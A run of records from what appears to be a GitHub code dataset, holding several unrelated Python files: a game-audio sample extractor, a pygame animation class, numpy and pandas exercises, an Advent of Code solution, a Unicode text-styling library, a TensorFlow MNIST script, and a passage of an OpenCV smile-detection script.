meta[\"samples\"])\r\n\r\n\r\n # 0x04 nibbles\r\n nibbles = samples_to_nibbles(meta[\"samples\"])\r\n header += struct.pack(\">I\", nibbles)\r\n\r\n\r\n # 0x08 sample rate\r\n header += struct.pack(\">I\", meta[\"rate\"])\r\n\r\n\r\n # 0x0C loop flag\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x0E format (always zero - ADPCM)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x10 loop start address (in nibbles)\r\n header += struct.pack(\">I\", 0)\r\n\r\n\r\n # 0x14 loop end address (in nibbles)\r\n header += struct.pack(\">I\", 0)\r\n\r\n\r\n # 0x18 initial offset value (in nibbles)\r\n header += struct.pack(\">I\", 2)\r\n\r\n\r\n # 0x1C coefficients\r\n header += meta[\"coeffs\"]\r\n\r\n\r\n # 0x3C gain (always zero for ADPCM)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x3E predictor/scale\r\n header += meta[\"ps\"]\r\n\r\n\r\n # 0x40 sample history (n-1)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x42 sample history (n-2)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x44 loop context: predictor/scale\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x46 loop context: sample history (n-1)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x48 loop context: sample history (n-2)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x4A pad (reserved)\r\n header += struct.pack(\"22x\")\r\n\r\n\r\n return header\r\n\r\ndef read_u32_be(f):\r\n try:\r\n data = f.read(4)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Read error at 0x%08X\" % f.tell())\r\n return struct.unpack(\">I\", data)[0]\r\n\r\ndef main(argc=len(sys.argv), argv=sys.argv):\r\n if argc != 2:\r\n print(\"Usage: %s \" % argv[0])\r\n return 1\r\n\r\n dir_in = os.path.realpath(argv[1])\r\n if os.path.isdir(dir_in) is not True:\r\n print(\"ERROR: Invalid directory path\")\r\n return 1\r\n\r\n hed_path = os.path.join(dir_in, \"bio4midi.hed\")\r\n if os.path.isfile(hed_path) is not True:\r\n print(\"ERROR: Could not find bio4midi.hed\")\r\n return 1\r\n\r\n dat_path = os.path.join(dir_in, \"bio4midi.dat\")\r\n if os.path.isfile(dat_path) is not True:\r\n print(\"ERROR: Could not find bio4midi.dat\")\r\n return 1\r\n\r\n num_banks = os.path.getsize(hed_path) // 4\r\n\r\n bank_offsets = []\r\n\r\n with open(hed_path, \"rb\") as hed:\r\n\r\n for i in xrange(num_banks):\r\n\r\n bank_offset = read_u32_be(hed)\r\n\r\n if (bank_offset == 0 and hed.tell() == 4) or (bank_offset != 0 and hed.tell() > 4):\r\n\r\n bank_offsets.append(bank_offset)\r\n\r\n with open(dat_path, \"rb\") as dat:\r\n\r\n bank_num = 0\r\n\r\n for bank_offset in bank_offsets:\r\n\r\n dat.seek(bank_offset + 0x24)\r\n\r\n info_size = read_u32_be(dat)\r\n\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n info_offset = read_u32_be(dat)\r\n\r\n dat.seek(20, os.SEEK_CUR)\r\n\r\n stream_size = read_u32_be(dat)\r\n\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n stream_offset = read_u32_be(dat)\r\n\r\n dat.seek(bank_offset + info_offset + 0x20)\r\n\r\n meta1_offset = read_u32_be(dat)\r\n\r\n meta2_offset = read_u32_be(dat)\r\n\r\n meta1_size = meta2_offset - meta1_offset\r\n meta1_size -= meta1_size % 16\r\n\r\n num_samples = meta1_size // 16\r\n\r\n dat.seek(bank_offset + info_offset + 16 + meta1_offset)\r\n\r\n meta = {}\r\n\r\n for i in xrange(num_samples):\r\n\r\n meta[i] = {}\r\n\r\n meta[i][\"rate\"] = read_u32_be(dat)\r\n meta[i][\"offset\"] = read_u32_be(dat)\r\n meta[i][\"samples\"] = read_u32_be(dat)\r\n\r\n # seek past sample number (2) and reserved slot(?) (2)\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n dat.seek(bank_offset + info_offset + 16 + meta2_offset)\r\n\r\n for i in xrange(num_samples):\r\n # coefficients\r\n meta[i][\"coeffs\"] = dat.read(32)\r\n\r\n # gain maybe .. ? skipping for now, should always be 0 anyway\r\n dat.seek(2, os.SEEK_CUR)\r\n\r\n # predictor/scale\r\n meta[i][\"ps\"] = dat.read(2)\r\n\r\n # not entirely sure what the other stuff is yet (but presumably just sample history 1/2, etc.)\r\n dat.seek(10, os.SEEK_CUR)\r\n\r\n for i in xrange(num_samples):\r\n\r\n dat.seek(bank_offset + stream_offset + (meta[i][\"offset\"] // 2))\r\n\r\n dsp_path = os.path.join(dir_in, (\"BANK%02d_%04d.dsp\" % (bank_num, i)))\r\n\r\n sample_size = samples_to_bytes(meta[i][\"samples\"])\r\n\r\n with open(dsp_path, \"wb\") as dsp:\r\n\r\n dsp.write( dsp_header(meta[i]) )\r\n\r\n extract_data(dat, dsp, sample_size)\r\n\r\n bank_num += 1\r\n\r\n return 0\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"Nisto/bio-tools","sub_path":"bio4/midi-smp-extract/midi-smp-extract.py","file_name":"midi-smp-extract.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"35911714400","text":"'A class for animations'\r\n#IMPORTS\r\nimport pygame\r\nfrom pathlib import Path\r\nfrom .core import load_image, most_used\r\n#IMPORTS\r\n\r\n#ANIMATIONS\r\nclass Animations:\r\n\t'''A class for animations\r\n\tNot all the animations should be done in one Animations class, it is good to create one for Entities and such\r\n\tIt can set an action when being initialised, even though no animation is created yet\r\n\r\n\tAttributes:\r\n\r\n\taction\r\n\r\n\tanimation_frames\r\n\r\n\tanimations_data\r\n\r\n\tframe'''\r\n\t#__INIT__\r\n\tdef __init__(self, action=None):\r\n\t\t'Initialising an Animations class'\r\n\t\tself.animations_data = {}\r\n\t\tself.animation_frames = {}\r\n\t\tself.action = action\r\n\t\tself.frame = 0\r\n\t#__INIT__\r\n\r\n\t#__REPR__\r\n\tdef __repr__(self):\r\n\t\t'''Returns a string representation of the object\r\n\r\n\t\tReturns: str'''\r\n\t\treturn 'pgeng.Animations'\r\n\t#__REPR__\r\n\r\n\t#ADD_ANIMATION\r\n\tdef load_animation(self, path, frame_durations, repeat=True, colourkey=None, file_type=None, animation_name=None, alpha=255, convert_alpha=False):\r\n\t\t'''A function for loading still images for a animation\r\n\r\n\t\tIt loads all images in a directory, the last character before the file type needs to be a number\r\n\t\tThe name of the directory it is in needs to be in the file name (directories above that don't matter),\r\n\t\tThe file type of the frames should be the most used file type in the directory\r\n\t\tExample:\r\n\t\t\t'run/run1.png'\r\n\t\t\t'run/run2.png'\r\n\r\n\t\tOr you can use file_type variable\r\n\t\tExample:\r\n\t\t\tfile_type='.png'\r\n\r\n\t\tIf you don't want the name of the directory to be the name of the animation, you could use animation_name\r\n\t\tIf you do that, the file name should still be the same as the directory\r\n\r\n\t\tframe_durations is a list or tuple with how long each frame should last, it has to be in order\r\n\t\trepeat is if the animation should loop, if it is False, the image would stay on the last one\r\n\t\tThe images will be added to animation_frames'''\r\n\t\tpath = Path(path).resolve()\r\n\t\tif not path.is_dir():\r\n\t\t\traise FileNotFoundError(f'Directory \\'{path}\\' does not exist')\r\n\t\tanimation_name = path.name if animation_name is None else animation_name\r\n\t\tself.animations_data[animation_name] = [[], repeat, 0]\r\n\t\tif not file_type:\r\n\t\t\tfile_type = most_used([file.suffix for file in path.iterdir() if file.is_file()])[0]\r\n\t\tfor i, frame_duration in enumerate(frame_durations):\r\n\t\t\tif not path.joinpath(f'{path.name}{i + 1}{file_type}').is_file():\r\n\t\t\t\traise pygame.error(f'Too many non image files in \\'{path}\\' or the image file is not named \\'{path.name}{i + 1}{file_type}\\'')\r\n\t\t\tanimation_frame_id = f'{animation_name}{i + 1}'\r\n\t\t\tself.animation_frames[animation_frame_id] = load_image(path.joinpath(f'{path.name}{i + 1}{file_type}'), colourkey, alpha, convert_alpha)\r\n\t\t\tself.animations_data[animation_name][0].append((animation_frame_id, frame_duration))\r\n\t\t\tself.animations_data[animation_name][2] += frame_duration\r\n\t#ADD_ANIMATION\r\n\r\n\t#ADD_IMAGE\r\n\tdef add_image(self, image, animation_name, duration, repeat=True):\r\n\t\t'''Manually add an image to an animation\r\n\t\tIf the animation_name does not yes exist, it will be created\r\n\t\tThe image will be added to animation_frames with a number, so it has to be added in the correct order'''\r\n\t\tif animation_name not in self.animations_data:\r\n\t\t\tself.animations_data[animation_name] = [[], repeat, 0]\r\n\t\tanimation_frame_id = f'{animation_name}{len(self.animations_data[animation_name][0]) + 1}'\r\n\t\tself.animation_frames[animation_frame_id] = image.copy()\r\n\t\tself.animations_data[animation_name][0].append((animation_frame_id, duration))\r\n\t\tself.animations_data[animation_name][2] += duration\r\n\t#ADD_IMAGE\r\n\r\n\t#CURRENT_IMAGE\r\n\tdef current_image(self, delta_time=1):\r\n\t\t'''Get the current image in the animation\r\n\t\tdelta_time is how much the frame should update, usually it would be 1\r\n\r\n\t\tReturns: pygame.Surface'''\r\n\t\tif self.action not in self.animations_data:\r\n\t\t\traise KeyError(f'Animation \\'{action}\\' is not defined')\r\n\t\tanimation_data = self.animations_data[self.action]\r\n\t\tself.frame += delta_time\r\n\t\treset_frame = round(self.frame) > animation_data[2]\r\n\t\tif reset_frame and animation_data[1]:\r\n\t\t\tself.frame = 0\r\n\t\telif reset_frame and not animation_data[1]:\r\n\t\t\tself.frame = animation_data[2]\r\n\t\tfor i, frame_data in enumerate(animation_data[0]):\r\n\t\t\tif round(self.frame) <= sum([frame_duration[1] for frame_duration in animation_data[0]][:i + 1]):\r\n\t\t\t\treturn self.animation_frames[frame_data[0]]\r\n\t#CURRENT_IMAGE\r\n\r\n\t#SET_ACTION\r\n\tdef set_action(self, action):\r\n\t\t'Set the current action, the frame will also be reset to 0'\r\n\t\tif action not in self.animations_data:\r\n\t\t\traise KeyError(f'Animation \\'{action}\\' is not defined')\r\n\t\tif self.action != action:\r\n\t\t\tself.action = action\r\n\t\t\tself.frame = 0\r\n\t#SET_ACTION\r\n#ANIMATIONS","repo_name":"Bouncehball/pgeng","sub_path":"pgeng/animations.py","file_name":"animations.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"35422247521","text":"import numpy as np\nimport pandas\n\n#Punto 1\nrandomArray = np.random.randint(10000, size=100)\nmedianValue = np.median(randomArray)\n\n#Punto 2\ndef factorial(n):\n return np.math.factorial(n)\n\ndef sumOfSeries(num1, num2):\n arr = np.arange(num1, num2+1)\n print(arr)\n if num1 >= num2:\n return \"the first number must be bigger than the second\"\n else:\n return np.sum(arr)\n\n#Punto 3\ndef salariosNetos():\n salariosCSV = pandas.read_csv('./Salarios.csv')\n salariosNetos = salariosCSV.loc[:,'Salario mensual NETO (en tu moneda local)'].to_numpy()\n salariosNetos = salariosNetos.astype(int)\n return \"Median: \" + str(np.median(salariosNetos)) + \" Mean: \" + str(np.mean(salariosNetos))\n\n\n\n\n","repo_name":"MartinFarres/Coder","sub_path":"Arrays Farres.py","file_name":"Arrays Farres.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9083674664","text":"BORDER = 10\n\nwith open(\"day9/input.txt\", 'r') as file:\n heightmap = [[int(char) for char in line.strip('\\n')] for line in file]\n #print(heightmap)\n\nlow_points = []\n\n### PART 1 ###\ndef find_neighbours(heightmap, row, col):\n north = heightmap[row - 1][col] if row - 1 >= 0 else BORDER\n west = heightmap[row][col - 1] if col - 1 >= 0 else BORDER\n east = heightmap[row][col + 1] if col + 1 < len(heightmap[row]) else BORDER\n south = heightmap[row + 1][col] if row + 1 < len(heightmap) else BORDER\n return [height for height in [north, west, east, south] if height < BORDER]\n\nsum_risk_level = 0\nfor row in range(len(heightmap)):\n for col in range(len(heightmap[row])):\n neighbours = find_neighbours(heightmap, row, col)\n current = heightmap[row][col]\n if all(current < neighbour for neighbour in neighbours):\n #print(f\"Current [{row}][{col}]: {current}\")\n #print(neighbours)\n low_points.append((row, col))\n sum_risk_level += current + 1\n\n### PART 1 ANSWER: \n#print(sum_risk_level)\n\n\n### PART 2 ###\ndef rec_determine_basin_size(heightmap, basin_points_set, point):\n row = point[0]\n col = point[1]\n basin_points_set.add(point)\n\n north = (row - 1, col) if row - 1 >= 0 else (-1, -1)\n west = (row, col - 1) if col - 1 >= 0 else (-1, -1)\n east = (row, col + 1) if col + 1 < len(heightmap[row]) else (-1, -1)\n south = (row + 1, col) if row + 1 < len(heightmap) else (-1, -1)\n\n neighbours = [tup for tup in [north, west, east, south] if tup != (-1, -1) and heightmap[tup[0]][tup[1]] < 9]\n for t in neighbours:\n neighbour_height = heightmap[t[0]][t[1]]\n if neighbour_height > heightmap[row][col] and t not in basin_points_set and neighbour_height != 9:\n rec_determine_basin_size(heightmap, basin_points_set, t)\n \n return len(basin_points_set)\n\nbasin_sizes = []\nfor point in low_points:\n size = rec_determine_basin_size(heightmap, set(), point)\n basin_sizes.append(size)\n\n### PART 2 ANSWER:\nbasin_sizes.sort(reverse=True)\nresult = basin_sizes[0] * basin_sizes[1] * basin_sizes[2]\nprint(result)\n","repo_name":"victorthedude/Advent-of-Code-2021","sub_path":"day9/smoke_basin.py","file_name":"smoke_basin.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73613084084","text":"# coding:utf-8\nimport pandas as pd\nimport numpy as np\n\nif __name__ == '__main__':\n path = '8名学生的考试成绩数据.csv'\n data = pd.read_csv(path, encoding='utf-8', delimiter=',')\n # 找出统计学等于75分的学生\n a1 = data.query('统计学成绩==[\"75\"]')\n print(a1['姓名'].values)\n # ['赵颖' '袁方']\n\n # 英语成绩最高的前三名学生\n data['row_number'] = data['英语成绩'].rank(ascending=0, method='first').astype(int)\n print(data[data['row_number'] <= 3]['姓名'].values)\n # ['王翔' '李华' '陈风']\n\n # 四门课程都大于70分的学生\n a2 = data[(data['英语成绩'] > 70) & (data['统计学成绩'] > 70) & (data['数学成绩'] > 70) & (data['经济学成绩'] > 70)]['姓名'].values\n print(a2)\n # ['王翔' '赵颖' '陈风']\n","repo_name":"XuanmoFeng/note","sub_path":"学习内容/统计学/code/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32491774830","text":"\"\"\"Convert Unicode characters.\"\"\"\nimport pathlib\nimport re\nfrom typing import Any, Dict, MutableMapping, Optional\n\nimport toml\n\nfrom . import exceptions\n\n\nclass Translator(dict):\n \"\"\"Translator for converting text to Unicode.\n\n Attributes:\n items (Dict[str, str]): Keys and values to prepopulate Translator.\n Optional.\n strict_case (bool): Whether to forbid characters from being\n converted to an upper or lower case counterpart if an exact\n match is not found. By default set to False.\n \"\"\"\n\n def __init__(\n self, items: Optional[Dict[str, str]] = None, strict_case: bool = False\n ) -> None:\n \"\"\"Constructor.\"\"\"\n if items is not None:\n self.update(items)\n self.strict_case = strict_case\n pass\n\n def __repr__(self) -> str:\n \"\"\"Representation of Translator.\"\"\"\n dict_repr = (\n \"{\"\n + \", \".join(\n \": \".join((f\"'{item}'\", f\"'{key}'\")) for item, key in self.items()\n )\n + \"}\"\n )\n return f\"Translator({dict_repr}, {self.strict_case})\"\n\n def __missing__(self, key: str) -> str:\n \"\"\"Return value in the case of a missing key.\n\n If ``strict_case`` is True, will return the key itself. If\n False, will first try to return a value matching the upper or\n lowercase variant of the key.\n\n Args:\n key (str): The key missing from Translator.\n\n Returns:\n str: The returned value.\n \"\"\"\n if self.strict_case:\n return key\n else:\n if key.upper() in self:\n return self[key.upper()]\n elif key.lower() in self:\n return self[key.lower()]\n else:\n return key\n\n\ndef _read_translator(strict_case: bool = False) -> MutableMapping[str, Any]:\n \"\"\"Read translator from config file.\n\n Args:\n strict_case (bool): Whether to forbid characters from being\n converted to an upper or lower case counterpart if an exact\n match is not found. By default set to False.\n\n Returns:\n MutableMapping[str, Any]: A dictionary where the keys are the\n unicode type, and the values are nested dictionaries with the\n keys are typical characters and the values are their\n converted unicode.\n \"\"\"\n toml_path = pathlib.Path(__file__).parent / pathlib.Path(\"translator.toml\")\n toml_text = toml_path.read_text()\n unicode_mapping = toml.loads(toml_text)\n translator = {\n unicode_type: Translator(unicode_mapping[unicode_type], strict_case=strict_case)\n for unicode_type in unicode_mapping\n }\n return translator\n\n\ndef _format_names(name: str) -> str:\n \"\"\"Format dictionary key names to be human friendly.\n\n Args:\n name (str): The Unicode type name.\n\n Returns:\n str: The formatted Unicode type name.\n \"\"\"\n return name[0].upper() + name[1:].replace(\"_\", \" \")\n\n\ndef show_all(\n characters: str, strict_case: bool = False, reverse: bool = False\n) -> Dict[str, str]:\n \"\"\"Return all possible unicode conversions.\n\n Args:\n characters (str): The characters to convert.\n strict_case (bool): Whether to forbid a character from being\n converted to its lower or upper case counterpart if an exact\n mapping is not found. By default False.\n reverse (bool): Whether to reverse the returned characters. This\n can be useful when converting to ``unicode_type``\n \"inverted\" or \"reverse\". By default False.\n\n Returns:\n Dict(str, str): A dictionary with the converted characters.\n\n The dictionary keys are the names of character types and the\n values are the converted characters.\n\n Example:\n Show all possible conversions for the string \"Hello\".\n\n >>> import dressup\n >>> dressup.show_all(\"Hello\")\n {'Circle': 'Ⓗⓔⓛⓛⓞ', 'Negative circle': '🅗🅔🅛🅛🅞',\n 'Monospace': 'Hello', 'Math bold': '𝐇𝐞𝐥𝐥𝐨',\n 'Math bold fraktur': '𝕳𝖊𝖑𝖑𝖔', 'Math bold italic': '𝑯𝒆𝒍𝒍𝒐',\n 'Math bold script': '𝓗𝓮𝓵𝓵𝓸', 'Math double struck': 'ℍ𝕖𝕝𝕝𝕠',\n 'Math monospace': '𝙷𝚎𝚕𝚕𝚘', 'Math sans': '𝖧𝖾𝗅𝗅𝗈', 'Math sans bold':\n '𝗛𝗲𝗹𝗹𝗼', 'Math sans bold italic': '𝙃𝙚𝙡𝙡𝙤', 'Math sans italic':\n '𝘏𝘦𝘭𝘭𝘰', 'Parenthesized': '⒣⒠⒧⒧⒪', 'Square': '🄷🄴🄻🄻🄾',\n 'Negative square': '🅷🅴🅻🅻🅾', 'Cute': 'Héĺĺő', 'Math fraktur':\n 'ℌ𝔢𝔩𝔩𝔬', 'Rock dots': 'Ḧëḷḷö', 'Small caps': 'ʜᴇʟʟᴏ', 'Stroked':\n 'Ħɇłłø', 'Subscript': 'ₕₑₗₗₒ', 'Superscript': 'ᴴᵉˡˡᵒ',\n 'Inverted': 'ɥǝןןo', 'Reversed': 'Hɘ⅃⅃o'}\n \"\"\"\n translator = _read_translator(strict_case=strict_case)\n if reverse:\n characters = characters[::-1]\n converted_characters = {\n _format_names(character_type): \"\".join(\n translator[normalize_text(character_type)][character]\n for character in characters\n )\n for character_type in translator\n }\n\n return converted_characters\n\n\ndef normalize_text(text_input: str) -> str:\n \"\"\"Normalize inputted text for easy dictionary matching.\n\n Strips surrounding whitespace, changes all characters to lowercase,\n and replaces inner whitespace with \"_\".\n\n Args:\n text_input (str): An inputted name.\n\n Returns:\n str: A normalized version of the name.\n \"\"\"\n return re.sub(r\"\\s+\", \"_\", text_input.strip().lower().replace(\"-\", \"_\"))\n\n\ndef convert(\n characters: str, unicode_type: str, strict_case: bool = False, reverse: bool = False\n) -> str:\n \"\"\"Convert characters to a Unicode character type.\n\n Args:\n characters (str): The characters to convert.\n unicode_type (str): The type of Unicode character types to\n convert to. Valid values are \"circle\", \"negative circle\",\n \"monospace\", \"math bold\", \"math bold fraktur\",\n \"math bold italic\", \"math bold script\",\n \"math double struck\", \"math monospace\",\n \"math sans\", \"math sans bold\", \"math sans bold italic\",\n \"math sans italic\", \"parenthesized\", \"square\",\n \"negative square\", \"cute\", \"math fraktur\", \"rock dots\",\n \"small caps\", \"stroked\", \"subscript\", \"superscript\",\n \"inverted\", and \"reversed\".\n strict_case (bool): Whether to forbid a character from being\n converted to its lower or upper case counterpart if an exact\n mapping is not found. By default False.\n reverse (bool): Whether to reverse the returned characters. This\n can be useful when converting to ``unicode_type``\n \"inverted\" or \"reverse\". By default False.\n\n Returns:\n str: The converted Unicode characters.\n\n Raises:\n InvalidUnicodeTypeError: Raised if value inputted in\n ``unicode_type`` is invalid.\n\n Examples:\n Convert the string \"Hello\" to negative circle characters.\n\n >>> import dressup\n >>> dressup.convert(\"Hello\", unicode_type=\"negative circle\")\n '🅗🅔🅛🅛🅞'\n\n Convert the string \"Hello\" to negative circle characters, but\n don't convert lowercase to uppercase if a perfect match isn't\n found.\n\n >>> import dressup\n >>> dressup.convert(\n ... \"Hello\",\n ... unicode_type=\"negative circle\",\n ... strict_case=True,\n ... )\n '🅗ello'\n\n Concvert the string \"Hello\" to reversed characters, but\n\n >>> import dressup\n >>> import dressup\n >>> dressup.convert(\n ... \"Hello\",\n ... unicode_type=\"reversed\",\n ... reverse=True,\n ... )\n 'o⅃⅃ɘH'\n \"\"\"\n unicode_type = normalize_text(unicode_type)\n translator = _read_translator()\n if reverse:\n characters = characters[::-1]\n try:\n type_mapping = translator[unicode_type]\n except KeyError as error:\n valid_types = \", \".join(translator.keys())\n raise exceptions.InvalidUnicodeTypeError(\n f\"'{unicode_type}' is not a valid Unicode type.\"\n f\" Valid types are {valid_types}.\"\n ) from error\n if strict_case:\n converted_character = \"\".join(\n type_mapping.get(character, character) for character in characters\n )\n else:\n converted_character = \"\".join(\n type_mapping.get(\n character,\n type_mapping.get(\n character.upper(), type_mapping.get(character.lower(), character)\n ),\n )\n for character in characters\n )\n return converted_character\n","repo_name":"paw-lu/dressup","sub_path":"src/dressup/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":8945,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"76"} +{"seq_id":"14790937440","text":"# Usage: tf_ptq_dnn.py --tfmodel models/baseline_dnn_32bit.tf\nimport tensorflow as tf\nimport larq as lq\nfrom sklearn.preprocessing import LabelEncoder\nimport time\nimport argparse\nimport numpy as np\nimport tempfile\nimport os\nfrom simple_network import MyNet\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--tfmodel\", required=True,\n\thelp=\"path to output model\")\n\nargs = vars(ap.parse_args())\n\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n\ntrain_images = train_images.reshape((60000, 28, 28, 1))\ntest_images = test_images.reshape((10000, 28, 28, 1))\n\ntrain_labels = LabelEncoder().fit_transform(train_labels)\ntest_labels = LabelEncoder().fit_transform(test_labels)\n\n# Normalize pixel values to be between -1 and 1\n#train_images, test_images = train_images / 127.5 - 1, test_images / 127.5 - 1\ntrain_images = train_images.astype(np.float32) / 255.0\ntest_images = test_images.astype(np.float32) / 255.0\n\ninput_layer = tf.keras.layers.Input(shape=(28, 28, 1))\nx = MyNet(classes = 10)(input_layer)\nmodel = tf.keras.models.Model(inputs=input_layer, outputs=x)\n\nmodel.summary()\nlq.models.summary(model)\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, batch_size=64, epochs=6)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\n\nprint(f\"Test accuracy {test_acc * 100:.2f} %\")\n\nprint(\"[INFO] serializing model...\")\nmodel.save(args[\"tfmodel\"])","repo_name":"satya15july/quantization","sub_path":"tensorflow/tf_dnn.py","file_name":"tf_dnn.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29061016218","text":"#!/usr/bin/env python\nimport cv2.cv as cv\nimport cv2\nimport time\nimport Image\nimport threading\n###########################\nimport matplotlib\nimport datetime\nimport matplotlib.dates as md\nimport time\n##########################\n\ncv.NamedWindow(\"camera\", 1)\ncapture = cv.CreateCameraCapture(0)\n\n#font = cv.CvFont\nfont = cv.InitFont(1, 1, 1, 1, 1, 1)\n\nwidth = None\nheight = None\nwidth = 640#480 #320\nheight = 480 #360#240\nsmileness = 0\nsmilecount = 0\n\nif width is None:\n width = int(cv.GetCaptureProperty(capture, cv.CV_CAP_PROP_FRAME_WIDTH))\nelse:\n cv.SetCaptureProperty(capture,cv.CV_CAP_PROP_FRAME_WIDTH,width) \n\nif height is None:\n height = int(cv.GetCaptureProperty(capture, cv.CV_CAP_PROP_FRAME_HEIGHT))\nelse:\n cv.SetCaptureProperty(capture,cv.CV_CAP_PROP_FRAME_HEIGHT,height) \n\nresult = cv.CreateImage((width,height),cv.IPL_DEPTH_8U,3) \n\nmqLoop = 0\n\n\n\n\ndef DetectRedEyes(image, faceCascade, smileCascade):\n min_size = (20,20)\n image_scale = 2\n haar_scale = 1.2\n min_neighbors = 2\n haar_flags = 0\n\n # Allocate the temporary images\n gray = cv.CreateImage((image.width, image.height), 8, 1)\n smallImage = cv.CreateImage((cv.Round(image.width / image_scale),cv.Round (image.height / image_scale)), 8 ,1)\n\n # Convert color input image to grayscale\n cv.CvtColor(image, gray, cv.CV_BGR2GRAY)\n\n # Scale input image for faster processing\n cv.Resize(gray, smallImage, cv.CV_INTER_LINEAR)\n\n # Equalize the histogram\n cv.EqualizeHist(smallImage, smallImage)\n\n # Detect the faces\n faces = cv.HaarDetectObjects(smallImage, faceCascade, cv.CreateMemStorage(0),\n haar_scale, min_neighbors, haar_flags, min_size)\n\n # If faces are found\n if faces:\n \n #print faces\n\n for ((x, y, w, h), n) in faces:\n # the input to cv.HaarDetectObjects was resized, so scale the\n # bounding box of each face and convert it to two CvPoints\n #print \"face\"\n pt1 = (int(x * image_scale), int(y * image_scale))\n pt2 = (int((x + w) * image_scale), int((y + h) * image_scale))\n # print pt1\n # print pt2\n #cv.Rectangle(image, pt1, pt2, cv.RGB(255, 0, 0), 1, 8, 0)\n #corner 1\n #str(pt2[1] - pt1[1])\n #cv.PutText(image, \"hi!\", pt1, font, cv.RGB(255, 0, 0))\n \n #cv.PutText(image, \"(pt1[0],pt1[1])\", pt1, font, cv.RGB(255, 0, 0))\n #corner 2\n #cv.PutText(image, \"(pt2[0],pt1[1])\", (pt2[0],pt1[1]), font, cv.RGB(255, 0, 0))\n #corner 3\n #cv.PutText(image, \"(pt1[0],pt2[1])\", (pt1[0],pt2[1]), font, cv.RGB(255, 0, 0))\n #corner 4\n #cv.PutText(image, \"(pt2[0],pt2[1])\", pt2, font, cv.RGB(255, 0, 0))\n #face_region = cv.GetSubRect(image,(x,int(y + (h/4)),w,int(h/2))) \n #split face\n #cv.Rectangle(image, (pt1[0],(pt1[1] + (abs(pt1[1]-pt2[1]) / 2 ))), pt2, cv.RGB(0,255,0), 1, 8, 0)\n #cv.PutText(image, \"isolating lower\", (pt1[0],(pt1[1] + (abs(pt1[1]-pt2[1]) / 2 ))), font, cv.RGB(0, 255, 0))\n \n cv.SetImageROI(image, (pt1[0],\n (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\n pt2[0] - pt1[0],\n int((pt2[1] - (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 ))))))\n \n smiles = cv.HaarDetectObjects(image, smileCascade, cv.CreateMemStorage(0), 1.1, 5, 0, (15,15))\n \n if smiles:\n #print smiles\n \n for smile in smiles:\n #cv.Rectangle(image,\n #(smile[0][0],smile[0][1]),\n #(smile[0][0] + smile[0][2], smile[0][1] + smile[0][3]),\n #cv.RGB(0, 0, 255), 1, 8, 0)\n\n #cv.PutText(image, \"smile\", (smile[0][0],smile[0][1]), font, cv.RGB(0, 0, 255))\n \n #cv.PutText(image,str(smile[1]), (smile[0][0], smile[0][1] + smile[0][3]), font, cv.RGB(0, 0, 255))\n \n \n #print ((abs(smile[0][1] - smile[0][2]) / abs(pt1[0] - pt2[0])) * 100)\n cv.ResetImageROI(image)\n if smile[1] + smile[0][3] > 45:\n cv.Circle(image, ( (pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ), w, (47,255,173), -1, lineType=8, shift=0)\n #cv.SetImageROI(image,(pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ) ,)\n smilept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt2[1] + (pt1[1] + pt2[1])/2 ))/2)\n smilept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),pt2[1])# int(((pt1[1]+pt2[1])/2 + pt2[1])/2))\n #cv.Rectangle(image, smilept1, smilept2, cv.RGB(0,255,0), 1, 8, 0)\n #cv2.ellipse(image,(256,256),(100,50),0,0,180,255,-1)\n #cv.SetImageROI(image, (smilept1[0], smilept1[1], smilept2[0]-smilept1[0], smilept2[1]-smilept1[1]))\n #cv.Circle(image, ( (pt1[0] +pt2[0])/2,(pt1[1] + pt2[1])/2+40), int(w/1.2), (0,0,0), -1, lineType=8, shift=0)\n cv.Ellipse(image, ((pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 + int(w/7) ), (int(w/1.7),h/2), 270, 90, 270, (0,0,0), thickness=4, lineType=4, shift=0)\n eyept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt1[1] + (pt1[1] + pt2[1])/2 ))/2)\n eyept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt1[1])/2))\n cv.Circle(image, eyept1, int(w/9), 